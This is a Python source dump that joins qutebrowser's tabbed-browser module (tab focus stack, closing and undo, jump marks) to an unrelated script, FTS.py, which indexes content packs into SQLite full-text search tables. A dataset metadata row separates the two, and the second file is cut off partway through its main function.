from PyQt5.QtCore import pyqtSignal, pyqtSlot, QTimer, QUrl
from PyQt5.QtGui import QIcon
from qutebrowser.config import config
from qutebrowser.keyinput import modeman
from qutebrowser.mainwindow import tabwidget, mainwindow
from qutebrowser.browser import signalfilter, browsertab, history
from qutebrowser.utils import (log, usertypes, utils, qtutils, objreg,
urlutils, message, jinja)
from qutebrowser.misc import quitter
@attr.s
class UndoEntry:
"""Information needed for :undo."""
url = attr.ib()
history = attr.ib()
index = attr.ib()
pinned = attr.ib()
class TabDeque:
"""Class which manages the 'last visited' tab stack.
Instead of handling deletions by clearing old entries, they are handled by
checking if they exist on access. This allows us to save an iteration on
every tab delete.
Currently, we assume we will switch to the tab returned by any of the
getter functions. This is done because the on_switch functions will be
called upon switch, and we don't want to duplicate entries in the stack
for a single switch.
"""
def __init__(self) -> None:
self._stack = collections.deque(
maxlen=config.val.tabs.focus_stack_size
) # type: typing.Deque[weakref.ReferenceType[QWidget]]
# Items that have been removed from the primary stack.
self._stack_deleted = [
] # type: typing.List[weakref.ReferenceType[QWidget]]
self._ignore_next = False
self._keep_deleted_next = False
def on_switch(self, old_tab: QWidget) -> None:
"""Record tab switch events."""
if self._ignore_next:
self._ignore_next = False
self._keep_deleted_next = False
return
tab = weakref.ref(old_tab)
if self._stack_deleted and not self._keep_deleted_next:
self._stack_deleted = []
self._keep_deleted_next = False
self._stack.append(tab)
def prev(self, cur_tab: QWidget) -> QWidget:
"""Get the 'previous' tab in the stack.
Throws IndexError on failure.
"""
tab = None # type: typing.Optional[QWidget]
while tab is None or tab.pending_removal or tab is cur_tab:
tab = self._stack.pop()()
self._stack_deleted.append(weakref.ref(cur_tab))
self._ignore_next = True
return tab
def next(self, cur_tab: QWidget, *, keep_overflow=True) -> QWidget:
"""Get the 'next' tab in the stack.
Throws IndexError on failure.
"""
tab = None # type: typing.Optional[QWidget]
while tab is None or tab.pending_removal or tab is cur_tab:
tab = self._stack_deleted.pop()()
# On next tab-switch, current tab will be added to stack as normal.
# However, we shouldn't wipe the overflow stack as normal.
if keep_overflow:
self._keep_deleted_next = True
return tab
def last(self, cur_tab: QWidget) -> QWidget:
"""Get the last tab.
Throws IndexError on failure.
"""
try:
return self.next(cur_tab, keep_overflow=False)
except IndexError:
return self.prev(cur_tab)
def update_size(self) -> None:
"""Update the maxsize of this TabDeque."""
newsize = config.val.tabs.focus_stack_size
if newsize < 0:
newsize = None
# We can't resize a collections.deque so just recreate it >:(
self._stack = collections.deque(self._stack, maxlen=newsize)
class TabDeletedError(Exception):
"""Exception raised when _tab_index is called for a deleted tab."""
class TabbedBrowser(QWidget):
"""A TabWidget with QWebViews inside.
Provides methods to manage tabs, convenience methods to interact with the
current tab (cur_*) and filters signals to re-emit them when they occurred
in the currently visible tab.
For all tab-specific signals (cur_*) emitted by a tab, this happens:
- the signal gets filtered with _filter_signals and self.cur_* gets
emitted if the signal occurred in the current tab.
Attributes:
search_text/search_options: Search parameters which are shared between
all tabs.
_win_id: The window ID this tabbedbrowser is associated with.
_filter: A SignalFilter instance.
_now_focused: The tab which is focused now.
_tab_insert_idx_left: Where to insert a new tab with
tabs.new_tab_position set to 'prev'.
_tab_insert_idx_right: Same as above, for 'next'.
_undo_stack: List of lists of UndoEntry objects of closed tabs.
shutting_down: Whether we're currently shutting down.
_local_marks: Jump markers local to each page
_global_marks: Jump markers used across all pages
default_window_icon: The qutebrowser window icon
is_private: Whether private browsing is on for this window.
Signals:
cur_progress: Progress of the current tab changed (load_progress).
cur_load_started: Current tab started loading (load_started)
cur_load_finished: Current tab finished loading (load_finished)
cur_url_changed: Current URL changed.
cur_link_hovered: Link hovered in current tab (link_hovered)
cur_scroll_perc_changed: Scroll percentage of current tab changed.
arg 1: x-position in %.
arg 2: y-position in %.
cur_load_status_changed: Loading status of current tab changed.
close_window: The last tab was closed, close this window.
resized: Emitted when the browser window has resized, so the completion
widget can adjust its size to it.
arg: The new size.
current_tab_changed: The current tab changed to the emitted tab.
new_tab: Emits the new WebView and its index when a new tab is opened.
"""
cur_progress = pyqtSignal(int)
cur_load_started = pyqtSignal()
cur_load_finished = pyqtSignal(bool)
cur_url_changed = pyqtSignal(QUrl)
cur_link_hovered = pyqtSignal(str)
cur_scroll_perc_changed = pyqtSignal(int, int)
cur_load_status_changed = pyqtSignal(usertypes.LoadStatus)
cur_fullscreen_requested = pyqtSignal(bool)
cur_caret_selection_toggled = pyqtSignal(bool)
close_window = pyqtSignal()
resized = pyqtSignal('QRect')
current_tab_changed = pyqtSignal(browsertab.AbstractTab)
new_tab = pyqtSignal(browsertab.AbstractTab, int)
def __init__(self, *, win_id, private, parent=None):
if private:
assert not qtutils.is_single_process()
super().__init__(parent)
self.widget = tabwidget.TabWidget(win_id, parent=self)
self._win_id = win_id
self._tab_insert_idx_left = 0
self._tab_insert_idx_right = -1
self.shutting_down = False
self.widget.tabCloseRequested.connect( # type: ignore
self.on_tab_close_requested)
self.widget.new_tab_requested.connect(self.tabopen)
self.widget.currentChanged.connect( # type: ignore
self._on_current_changed)
self.cur_fullscreen_requested.connect(self.widget.tabBar().maybe_hide)
self.widget.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
# WORKAROUND for https://bugreports.qt.io/browse/QTBUG-65223
if qtutils.version_check('5.10', compiled=False):
self.cur_load_finished.connect(self._leave_modes_on_load)
else:
self.cur_load_started.connect(self._leave_modes_on_load)
# This init is never used, it is immediately thrown away in the next
# line.
self._undo_stack = (
collections.deque()
) # type: typing.MutableSequence[typing.MutableSequence[UndoEntry]]
self._update_stack_size()
self._filter = signalfilter.SignalFilter(win_id, self)
self._now_focused = None
self.search_text = None
self.search_options = {} # type: typing.Mapping[str, typing.Any]
self._local_marks = {
} # type: typing.MutableMapping[QUrl, typing.MutableMapping[str, int]]
self._global_marks = {
} # type: typing.MutableMapping[str, typing.Tuple[int, QUrl]]
self.default_window_icon = self.widget.window().windowIcon()
self.is_private = private
self.tab_deque = TabDeque()
config.instance.changed.connect(self._on_config_changed)
quitter.instance.shutting_down.connect(self.shutdown)
def _update_stack_size(self):
newsize = config.instance.get('tabs.undo_stack_size')
if newsize < 0:
newsize = None
# We can't resize a collections.deque so just recreate it >:(
self._undo_stack = collections.deque(self._undo_stack, maxlen=newsize)
def __repr__(self):
return utils.get_repr(self, count=self.widget.count())
@pyqtSlot(str)
def _on_config_changed(self, option):
if option == 'tabs.favicons.show':
self._update_favicons()
elif option == 'window.title_format':
self._update_window_title()
elif option == 'tabs.undo_stack_size':
self._update_stack_size()
elif option in ['tabs.title.format', 'tabs.title.format_pinned']:
self.widget.update_tab_titles()
elif option == "tabs.focus_stack_size":
self.tab_deque.update_size()
def _tab_index(self, tab):
"""Get the index of a given tab.
Raises TabDeletedError if the tab doesn't exist anymore.
"""
try:
idx = self.widget.indexOf(tab)
except RuntimeError as e:
log.webview.debug("Got invalid tab ({})!".format(e))
raise TabDeletedError(e)
if idx == -1:
log.webview.debug("Got invalid tab (index is -1)!")
raise TabDeletedError("index is -1!")
return idx
def widgets(self):
"""Get a list of open tab widgets.
We don't implement this as generator so we can delete tabs while
iterating over the list.
"""
widgets = []
for i in range(self.widget.count()):
widget = self.widget.widget(i)
if widget is None:
log.webview.debug( # type: ignore
"Got None-widget in tabbedbrowser!")
else:
widgets.append(widget)
return widgets
def _update_window_title(self, field=None):
"""Change the window title to match the current tab.
Args:
idx: The tab index to update.
field: A field name which was updated. If given, the title
is only set if the given field is in the template.
"""
title_format = config.cache['window.title_format']
if field is not None and ('{' + field + '}') not in title_format:
return
idx = self.widget.currentIndex()
if idx == -1:
# (e.g. last tab removed)
log.webview.debug("Not updating window title because index is -1")
return
fields = self.widget.get_tab_fields(idx)
fields['id'] = self._win_id
title = title_format.format(**fields)
self.widget.window().setWindowTitle(title)
def _connect_tab_signals(self, tab):
"""Set up the needed signals for tab."""
# filtered signals
tab.link_hovered.connect(
self._filter.create(self.cur_link_hovered, tab))
tab.load_progress.connect(
self._filter.create(self.cur_progress, tab))
tab.load_finished.connect(
self._filter.create(self.cur_load_finished, tab))
tab.load_started.connect(
self._filter.create(self.cur_load_started, tab))
tab.scroller.perc_changed.connect(
self._filter.create(self.cur_scroll_perc_changed, tab))
tab.url_changed.connect(
self._filter.create(self.cur_url_changed, tab))
tab.load_status_changed.connect(
self._filter.create(self.cur_load_status_changed, tab))
tab.fullscreen_requested.connect(
self._filter.create(self.cur_fullscreen_requested, tab))
tab.caret.selection_toggled.connect(
self._filter.create(self.cur_caret_selection_toggled, tab))
# misc
tab.scroller.perc_changed.connect(self._on_scroll_pos_changed)
tab.scroller.before_jump_requested.connect(lambda: self.set_mark("'"))
tab.url_changed.connect(
functools.partial(self._on_url_changed, tab))
tab.title_changed.connect(
functools.partial(self._on_title_changed, tab))
tab.icon_changed.connect(
functools.partial(self._on_icon_changed, tab))
tab.load_progress.connect(
functools.partial(self._on_load_progress, tab))
tab.load_finished.connect(
functools.partial(self._on_load_finished, tab))
tab.load_started.connect(
functools.partial(self._on_load_started, tab))
tab.load_status_changed.connect(
functools.partial(self._on_load_status_changed, tab))
tab.window_close_requested.connect(
functools.partial(self._on_window_close_requested, tab))
tab.renderer_process_terminated.connect(
functools.partial(self._on_renderer_process_terminated, tab))
tab.audio.muted_changed.connect(
functools.partial(self._on_audio_changed, tab))
tab.audio.recently_audible_changed.connect(
functools.partial(self._on_audio_changed, tab))
tab.new_tab_requested.connect(self.tabopen)
if not self.is_private:
tab.history_item_triggered.connect(
history.web_history.add_from_tab)
def current_url(self):
"""Get the URL of the current tab.
Intended to be used from command handlers.
Return:
The current URL as QUrl.
"""
idx = self.widget.currentIndex()
return self.widget.tab_url(idx)
def shutdown(self):
"""Try to shut down all tabs cleanly."""
self.shutting_down = True
# Reverse tabs so we don't have to recacluate tab titles over and over
# Removing first causes [2..-1] to be recomputed
# Removing the last causes nothing to be recomputed
for tab in reversed(self.widgets()):
self._remove_tab(tab)
def tab_close_prompt_if_pinned(
self, tab, force, yes_action,
text="Are you sure you want to close a pinned tab?"):
"""Helper method for tab_close.
If tab is pinned, prompt. If not, run yes_action.
If tab is destroyed, abort question.
"""
if tab.data.pinned and not force:
message.confirm_async(
title='Pinned Tab',
text=text,
yes_action=yes_action, default=False, abort_on=[tab.destroyed])
else:
yes_action()
def close_tab(self, tab, *, add_undo=True, new_undo=True):
"""Close a tab.
Args:
tab: The QWebView to be closed.
add_undo: Whether the tab close can be undone.
new_undo: Whether the undo entry should be a new item in the stack.
"""
last_close = config.val.tabs.last_close
count = self.widget.count()
if last_close == 'ignore' and count == 1:
return
self._remove_tab(tab, add_undo=add_undo, new_undo=new_undo)
if count == 1: # We just closed the last tab above.
if last_close == 'close':
self.close_window.emit()
elif last_close == 'blank':
self.load_url(QUrl('about:blank'), newtab=True)
elif last_close == 'startpage':
for url in config.val.url.start_pages:
self.load_url(url, newtab=True)
elif last_close == 'default-page':
self.load_url(config.val.url.default_page, newtab=True)
def _remove_tab(self, tab, *, add_undo=True, new_undo=True, crashed=False):
"""Remove a tab from the tab list and delete it properly.
Args:
tab: The QWebView to be closed.
add_undo: Whether the tab close can be undone.
new_undo: Whether the undo entry should be a new item in the stack.
crashed: Whether we're closing a tab with crashed renderer process.
"""
idx = self.widget.indexOf(tab)
if idx == -1:
if crashed:
return
raise TabDeletedError("tab {} is not contained in "
"TabbedWidget!".format(tab))
if tab is self._now_focused:
self._now_focused = None
tab.pending_removal = True
if tab.url().isEmpty():
# There are some good reasons why a URL could be empty
# (target="_blank" with a download, see [1]), so we silently ignore
# this.
# [1] https://github.com/qutebrowser/qutebrowser/issues/163
pass
elif not tab.url().isValid():
# We display a warning for URLs which are not empty but invalid -
# but we don't return here because we want the tab to close either
# way.
urlutils.invalid_url_error(tab.url(), "saving tab")
elif add_undo:
try:
history_data = tab.history.private_api.serialize()
except browsertab.WebTabError:
pass # special URL
else:
entry = UndoEntry(tab.url(), history_data, idx,
tab.data.pinned)
if new_undo or not self._undo_stack:
self._undo_stack.append([entry])
else:
self._undo_stack[-1].append(entry)
tab.private_api.shutdown()
self.widget.removeTab(idx)
if not crashed:
# WORKAROUND for a segfault when we delete the crashed tab.
# see https://bugreports.qt.io/browse/QTBUG-58698
tab.layout().unwrap()
tab.deleteLater()
def undo(self):
"""Undo removing of a tab or tabs."""
# Remove unused tab which may be created after the last tab is closed
last_close = config.val.tabs.last_close
use_current_tab = False
if last_close in ['blank', 'startpage', 'default-page']:
only_one_tab_open = self.widget.count() == 1
no_history = len(self.widget.widget(0).history) == 1
urls = {
'blank': QUrl('about:blank'),
'startpage': config.val.url.start_pages[0],
'default-page': config.val.url.default_page,
}
first_tab_url = self.widget.widget(0).url()
last_close_urlstr = urls[last_close].toString().rstrip('/')
first_tab_urlstr = first_tab_url.toString().rstrip('/')
last_close_url_used = first_tab_urlstr == last_close_urlstr
use_current_tab = (only_one_tab_open and no_history and
last_close_url_used)
for entry in reversed(self._undo_stack.pop()):
if use_current_tab:
newtab = self.widget.widget(0)
use_current_tab = False
else:
# FIXME:typing mypy thinks this is None due to @pyqtSlot
newtab = typing.cast(
browsertab.AbstractTab,
self.tabopen(background=False, idx=entry.index))
newtab.history.private_api.deserialize(entry.history)
self.widget.set_tab_pinned(newtab, entry.pinned)
@pyqtSlot('QUrl', bool)
def load_url(self, url, newtab):
"""Open a URL, used as a slot.
Args:
url: The URL to open as QUrl.
newtab: True to open URL in a new tab, False otherwise.
"""
qtutils.ensure_valid(url)
if newtab or self.widget.currentWidget() is None:
self.tabopen(url, background=False)
else:
self.widget.currentWidget().load_url(url)
@pyqtSlot(int)
def on_tab_close_requested(self, idx):
"""Close a tab via an index."""
tab = self.widget.widget(idx)
if tab is None:
log.webview.debug( # type: ignore
"Got invalid tab {} for index {}!".format(tab, idx))
return
self.tab_close_prompt_if_pinned(
tab, False, lambda: self.close_tab(tab))
@pyqtSlot(browsertab.AbstractTab)
def _on_window_close_requested(self, widget):
"""Close a tab with a widget given."""
try:
self.close_tab(widget)
except TabDeletedError:
log.webview.debug("Requested to close {!r} which does not "
"exist!".format(widget))
@pyqtSlot('QUrl')
@pyqtSlot('QUrl', bool)
@pyqtSlot('QUrl', bool, bool)
def tabopen(
self, url: QUrl = None,
background: bool = None,
related: bool = True,
idx: int = None,
) -> browsertab.AbstractTab:
"""Open a new tab with a given URL.
Inner logic for open-tab and open-tab-bg.
Also connect all the signals we need to _filter_signals.
Args:
url: The URL to open as QUrl or None for an empty tab.
background: Whether to open the tab in the background.
if None, the `tabs.background` setting decides.
related: Whether the tab was opened from another existing tab.
If this is set, the new position might be different. With
the default settings we handle it like Chromium does:
- Tabs from clicked links etc. are to the right of
the current (related=True).
- Explicitly opened tabs are at the very right
(related=False)
idx: The index where the new tab should be opened.
Return:
The opened WebView instance.
"""
if url is not None:
qtutils.ensure_valid(url)
log.webview.debug("Creating new tab with URL {}, background {}, "
"related {}, idx {}".format(
url, background, related, idx))
prev_focus = QApplication.focusWidget()
if config.val.tabs.tabs_are_windows and self.widget.count() > 0:
window = mainwindow.MainWindow(private=self.is_private)
window.show()
tabbed_browser = objreg.get('tabbed-browser', scope='window',
window=window.win_id)
return tabbed_browser.tabopen(url=url, background=background,
related=related)
tab = browsertab.create(win_id=self._win_id,
private=self.is_private,
parent=self.widget)
self._connect_tab_signals(tab)
if idx is None:
idx = self._get_new_tab_idx(related)
self.widget.insertTab(idx, tab, "")
if url is not None:
tab.load_url(url)
if background is None:
background = config.val.tabs.background
if background:
# Make sure the background tab has the correct initial size.
# With a foreground tab, it's going to be resized correctly by the
# layout anyways.
tab.resize(self.widget.currentWidget().size())
self.widget.tab_index_changed.emit(self.widget.currentIndex(),
self.widget.count())
# Refocus webview in case we lost it by spawning a bg tab
self.widget.currentWidget().setFocus()
else:
self.widget.setCurrentWidget(tab)
# WORKAROUND for https://bugreports.qt.io/browse/QTBUG-68076
# Still seems to be needed with Qt 5.11.1
tab.setFocus()
mode = modeman.instance(self._win_id).mode
if mode in [usertypes.KeyMode.command, usertypes.KeyMode.prompt,
usertypes.KeyMode.yesno]:
# If we were in a command prompt, restore old focus
# The above commands need to be run to switch tabs
if prev_focus is not None:
prev_focus.setFocus()
tab.show()
self.new_tab.emit(tab, idx)
return tab
def _get_new_tab_idx(self, related):
"""Get the index of a tab to insert.
Args:
related: Whether the tab was opened from another tab (as a "child")
Return:
The index of the new tab.
"""
if related:
pos = config.val.tabs.new_position.related
else:
pos = config.val.tabs.new_position.unrelated
if pos == 'prev':
if config.val.tabs.new_position.stacking:
idx = self._tab_insert_idx_left
# On first sight, we'd think we have to decrement
# self._tab_insert_idx_left here, as we want the next tab to be
# *before* the one we just opened. However, since we opened a
# tab *before* the currently focused tab, indices will shift by
# 1 automatically.
else:
idx = self.widget.currentIndex()
elif pos == 'next':
if config.val.tabs.new_position.stacking:
idx = self._tab_insert_idx_right
else:
idx = self.widget.currentIndex() + 1
self._tab_insert_idx_right += 1
elif pos == 'first':
idx = 0
elif pos == 'last':
idx = -1
else:
raise ValueError("Invalid tabs.new_position '{}'.".format(pos))
log.webview.debug("tabs.new_position {} -> opening new tab at {}, "
"next left: {} / right: {}".format(
pos, idx, self._tab_insert_idx_left,
self._tab_insert_idx_right))
return idx
def _update_favicons(self):
"""Update favicons when config was changed."""
for tab in self.widgets():
self.widget.update_tab_favicon(tab)
@pyqtSlot()
def _on_load_started(self, tab):
"""Clear icon and update title when a tab started loading.
Args:
tab: The tab where the signal belongs to.
"""
if tab.data.keep_icon:
tab.data.keep_icon = False
else:
if (config.cache['tabs.tabs_are_windows'] and
tab.data.should_show_icon()):
self.widget.window().setWindowIcon(self.default_window_icon)
@pyqtSlot()
def _on_load_status_changed(self, tab):
"""Update tab/window titles if the load status changed."""
try:
idx = self._tab_index(tab)
except TabDeletedError:
# We can get signals for tabs we already deleted...
return
self.widget.update_tab_title(idx)
if idx == self.widget.currentIndex():
self._update_window_title()
@pyqtSlot()
def _leave_modes_on_load(self):
"""Leave insert/hint mode when loading started."""
try:
url = self.current_url()
if not url.isValid():
url = None
except qtutils.QtValueError:
url = None
if config.instance.get('input.insert_mode.leave_on_load',
url=url):
modeman.leave(self._win_id, usertypes.KeyMode.insert,
'load started', maybe=True)
else:
log.modes.debug("Ignoring leave_on_load request due to setting.")
if config.cache['hints.leave_on_load']:
modeman.leave(self._win_id, usertypes.KeyMode.hint,
'load started', maybe=True)
else:
log.modes.debug("Ignoring leave_on_load request due to setting.")
@pyqtSlot(browsertab.AbstractTab, str)
def _on_title_changed(self, tab, text):
"""Set the title of a tab.
Slot for the title_changed signal of any tab.
Args:
tab: The WebView where the title was changed.
text: The text to set.
"""
if not text:
log.webview.debug("Ignoring title change to '{}'.".format(text))
return
try:
idx = self._tab_index(tab)
except TabDeletedError:
# We can get signals for tabs we already deleted...
return
log.webview.debug("Changing title for idx {} to '{}'".format(
idx, text))
self.widget.set_page_title(idx, text)
if idx == self.widget.currentIndex():
self._update_window_title()
@pyqtSlot(browsertab.AbstractTab, QUrl)
def _on_url_changed(self, tab, url):
"""Set the new URL as title if there's no title yet.
Args:
tab: The WebView where the title was changed.
url: The new URL.
"""
try:
idx = self._tab_index(tab)
except TabDeletedError:
# We can get signals for tabs we already deleted...
return
if not self.widget.page_title(idx):
self.widget.set_page_title(idx, url.toDisplayString())
@pyqtSlot(browsertab.AbstractTab, QIcon)
def _on_icon_changed(self, tab, icon):
"""Set the icon of a tab.
Slot for the iconChanged signal of any tab.
Args:
tab: The WebView where the title was changed.
icon: The new icon
"""
if not tab.data.should_show_icon():
return
try:
idx = self._tab_index(tab)
except TabDeletedError:
# We can get signals for tabs we already deleted...
return
self.widget.setTabIcon(idx, icon)
if config.val.tabs.tabs_are_windows:
self.widget.window().setWindowIcon(icon)
@pyqtSlot(usertypes.KeyMode)
def on_mode_entered(self, mode):
"""Save input mode when tabs.mode_on_change = restore."""
if (config.val.tabs.mode_on_change == 'restore' and
mode in modeman.INPUT_MODES):
tab = self.widget.currentWidget()
if tab is not None:
tab.data.input_mode = mode
@pyqtSlot(usertypes.KeyMode)
def on_mode_left(self, mode):
"""Give focus to current tab if command mode was left."""
widget = self.widget.currentWidget()
if widget is None:
return # type: ignore
if mode in [usertypes.KeyMode.command] + modeman.PROMPT_MODES:
log.modes.debug("Left status-input mode, focusing {!r}".format(
widget))
widget.setFocus()
if config.val.tabs.mode_on_change == 'restore':
widget.data.input_mode = usertypes.KeyMode.normal
@pyqtSlot(int)
def _on_current_changed(self, idx):
"""Add prev tab to stack and leave hinting mode when focus changed."""
mode_on_change = config.val.tabs.mode_on_change
if idx == -1 or self.shutting_down:
# closing the last tab (before quitting) or shutting down
return
tab = self.widget.widget(idx)
if tab is None:
log.webview.debug( # type: ignore
"on_current_changed got called with invalid index {}"
.format(idx))
return
log.modes.debug("Current tab changed, focusing {!r}".format(tab))
tab.setFocus()
modes_to_leave = [usertypes.KeyMode.hint, usertypes.KeyMode.caret]
mm_instance = modeman.instance(self._win_id)
current_mode = mm_instance.mode
log.modes.debug("Mode before tab change: {} (mode_on_change = {})"
.format(current_mode.name, mode_on_change))
if mode_on_change == 'normal':
modes_to_leave += modeman.INPUT_MODES
for mode in modes_to_leave:
modeman.leave(self._win_id, mode, 'tab changed', maybe=True)
if (mode_on_change == 'restore' and
current_mode not in modeman.PROMPT_MODES):
modeman.enter(self._win_id, tab.data.input_mode, 'restore')
if self._now_focused is not None:
self.tab_deque.on_switch(self._now_focused)
log.modes.debug("Mode after tab change: {} (mode_on_change = {})"
.format(current_mode.name, mode_on_change))
self._now_focused = tab
self.current_tab_changed.emit(tab)
QTimer.singleShot(0, self._update_window_title)
self._tab_insert_idx_left = self.widget.currentIndex()
self._tab_insert_idx_right = self.widget.currentIndex() + 1
@pyqtSlot()
def on_cmd_return_pressed(self):
"""Set focus when the commandline closes."""
log.modes.debug("Commandline closed, focusing {!r}".format(self))
def _on_load_progress(self, tab, perc):
"""Adjust tab indicator on load progress."""
try:
idx = self._tab_index(tab)
except TabDeletedError:
# We can get signals for tabs we already deleted...
return
start = config.cache['colors.tabs.indicator.start']
stop = config.cache['colors.tabs.indicator.stop']
system = config.cache['colors.tabs.indicator.system']
color = utils.interpolate_color(start, stop, perc, system)
self.widget.set_tab_indicator_color(idx, color)
self.widget.update_tab_title(idx)
if idx == self.widget.currentIndex():
self._update_window_title()
def _on_load_finished(self, tab, ok):
"""Adjust tab indicator when loading finished."""
try:
idx = self._tab_index(tab)
except TabDeletedError:
# We can get signals for tabs we already deleted...
return
if ok:
start = config.cache['colors.tabs.indicator.start']
stop = config.cache['colors.tabs.indicator.stop']
system = config.cache['colors.tabs.indicator.system']
color = utils.interpolate_color(start, stop, 100, system)
else:
color = config.cache['colors.tabs.indicator.error']
self.widget.set_tab_indicator_color(idx, color)
if idx == self.widget.currentIndex():
tab.private_api.handle_auto_insert_mode(ok)
@pyqtSlot()
def _on_scroll_pos_changed(self):
"""Update tab and window title when scroll position changed."""
idx = self.widget.currentIndex()
if idx == -1:
# (e.g. last tab removed)
log.webview.debug("Not updating scroll position because index is "
"-1")
return
self._update_window_title('scroll_pos')
self.widget.update_tab_title(idx, 'scroll_pos')
def _on_audio_changed(self, tab, _muted):
"""Update audio field in tab when mute or recentlyAudible changed."""
try:
idx = self._tab_index(tab)
except TabDeletedError:
# We can get signals for tabs we already deleted...
return
self.widget.update_tab_title(idx, 'audio')
if idx == self.widget.currentIndex():
self._update_window_title('audio')
def _on_renderer_process_terminated(self, tab, status, code):
"""Show an error when a renderer process terminated."""
if status == browsertab.TerminationStatus.normal:
return
messages = {
browsertab.TerminationStatus.abnormal:
"Renderer process exited with status {}".format(code),
browsertab.TerminationStatus.crashed:
"Renderer process crashed",
browsertab.TerminationStatus.killed:
"Renderer process was killed",
browsertab.TerminationStatus.unknown:
"Renderer process did not start",
}
msg = messages[status]
def show_error_page(html):
tab.set_html(html)
log.webview.error(msg)
if qtutils.version_check('5.9', compiled=False):
url_string = tab.url(requested=True).toDisplayString()
error_page = jinja.render(
'error.html', title="Error loading {}".format(url_string),
url=url_string, error=msg)
QTimer.singleShot(100, lambda: show_error_page(error_page))
else:
# WORKAROUND for https://bugreports.qt.io/browse/QTBUG-58698
message.error(msg)
self._remove_tab(tab, crashed=True)
if self.widget.count() == 0:
self.tabopen(QUrl('about:blank'))
def resizeEvent(self, e):
"""Extend resizeEvent of QWidget to emit a resized signal afterwards.
Args:
e: The QResizeEvent
"""
super().resizeEvent(e)
self.resized.emit(self.geometry())
def wheelEvent(self, e):
"""Override wheelEvent of QWidget to forward it to the focused tab.
Args:
e: The QWheelEvent
"""
if self._now_focused is not None:
self._now_focused.wheelEvent(e)
else:
e.ignore()
def set_mark(self, key):
"""Set a mark at the current scroll position in the current tab.
Args:
key: mark identifier; capital indicates a global mark
"""
# strip the fragment as it may interfere with scrolling
try:
url = self.current_url().adjusted(QUrl.RemoveFragment)
except qtutils.QtValueError:
# show an error only if the mark is not automatically set
if key != "'":
message.error("Failed to set mark: url invalid")
return
point = self.widget.currentWidget().scroller.pos_px()
if key.isupper():
self._global_marks[key] = point, url
else:
if url not in self._local_marks:
self._local_marks[url] = {}
self._local_marks[url][key] = point
def jump_mark(self, key):
"""Jump to the mark named by `key`.
Args:
key: mark identifier; capital indicates a global mark
"""
try:
# consider urls that differ only in fragment to be identical
urlkey = self.current_url().adjusted(QUrl.RemoveFragment)
except qtutils.QtValueError:
urlkey = None
tab = self.widget.currentWidget()
if key.isupper():
if key in self._global_marks:
point, url = self._global_marks[key]
def callback(ok):
"""Scroll once loading finished."""
if ok:
self.cur_load_finished.disconnect(callback)
tab.scroller.to_point(point)
self.load_url(url, newtab=False)
self.cur_load_finished.connect(callback)
else:
message.error("Mark {} is not set".format(key))
elif urlkey is None:
message.error("Current URL is invalid!")
elif urlkey in self._local_marks and key in self._local_marks[urlkey]:
point = self._local_marks[urlkey][key]
# save the pre-jump position in the special ' mark
# this has to happen after we read the mark, otherwise jump_mark
# "'" would just jump to the current position every time
tab.scroller.before_jump_requested.emit()
tab.scroller.to_point(point)
else:
message.error("Mark {} is not set".format(key))
| gpl-3.0 | -6,031,515,982,452,400,000 | 38.555126 | 79 | 0.583081 | false |
academic-colab/maslo-server | FTS.py | 1 | 5261 | #!/usr/bin/env python
'''
/******************************************************************************
* FTS.py
*
* Copyright (c) 2011-2012, Academic ADL Co-Lab, University of Wisconsin-Extension
* http://www.academiccolab.org/
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public
* License as published by the Free Software Foundation; either
* version 3 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License for more details.
*
* You should have received a copy of the GNU General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
* MA 02110-1301 USA
*****************************************************************************/
'''
import sys
import os
import json
import urllib2
import re
import sqlite3 as dbs
## Reads a json file and returns a json object
def getJSON(path, isRelative=True):
if isRelative :
fPath = path + "/manifest"
else :
fPath = path
try :
f = open(fPath)
except :
print "File ", fPath, " cannot be opened."
return None
else :
data = json.load(f)
f.close()
return data
## Strip string passed as argument from common stopwords
def removeStopWords(text):
stopwords = ""
try :
f = open("stopwords.txt", "r")
except :
f = urllib2.urlopen('http://www.textfixer.com/resources/common-english-words.txt')
stopwords = f.read()
f = open("stopwords.txt", "w")
f.write(stopwords)
f.close()
else :
stopwords = f.read()
f.close()
stopwords = stopwords.strip().split(",")
for stopword in stopwords :
pattern = re.compile(r"\b%s\b"%stopword, re.IGNORECASE)
text = pattern.sub("", text)
pattern = re.compile("[\s]+")
text = pattern.sub(" ", text)
return text
## Create full text search table for pack contents
def createTable(db):
statement = "CREATE VIRTUAL TABLE content_search using FTS3(pack,section,content,tokenize=porter);"
try :
db.execute(statement)
db.commit()
except:
pass
## Create basic content pack table
def createTableUpper(db):
statement = "CREATE TABLE content (pack text, path text, version text, author text, public int DEFAULT 0, category text);"
try :
db.execute(statement)
db.commit()
except:
pass
## insert data into content pack tables - FTS and basic
def insertData(pack, path, db, zipName=None, versionPath=None, author=None):
data = getJSON(path)
query = "INSERT INTO content_search(pack, section, content) VALUES (?,?,?)"
query2 = "INSERT INTO content(pack, path, version, author, category) VALUES (?,?,?,?,?)"
if zipName :
version = "0"
category = ""
authorVal = ""
if versionPath is not None and author is not None :
print versionPath
versionData = getJSON(versionPath, False)
if versionData and "version" in versionData :
version = versionData["version"]
if versionData and "category" in versionData :
category = versionData["category"]
authorVal = author
try :
zn = zipName.replace("qDir-", "")
db.execute(query2, (pack.decode('utf-8'), zn.decode('utf-8'),version, authorVal.decode('utf-8'), category))
except Exception, e:
print "Insert failed: ",pack, zn, version, authorVal
print e
pass
pattern = re.compile("<[^>]+>")
print data
for entry in data :
title = entry["title"]
normalTitle = removeStopWords(title)
try :
db.execute(query, (pack.decode('utf-8'), title, normalTitle,))
except Exception, e:
print "error:", e
return
text = None
uPath = path.decode('utf-8')
if entry["type"] == "text" :
newPath = uPath+"/../"+entry["path"]
f = open(newPath)
text = f.read().strip()
f.close()
else :
newPath = uPath+"/../"+ entry["path"]+".dsc"
try :
f = open(newPath)
text = f.read().strip()
f.close()
except :
pass
if text is not None:
text = text.decode('utf-8')
text = pattern.sub(" ", text)
text = removeStopWords(text)
try :
db.execute(query, (pack.decode('utf-8'), title, text,))
except Exception, e:
print "error:", e
return
db.commit()
## Create tables if they don't exist, index argument-passed content pack, create database entries
def main(pathToManifest, PackName, pathToGlobalSearch=None, zipName=None, versionPath=None, author=None):
db = dbs.connect(pathToManifest+"/search.db")
createTable(db)
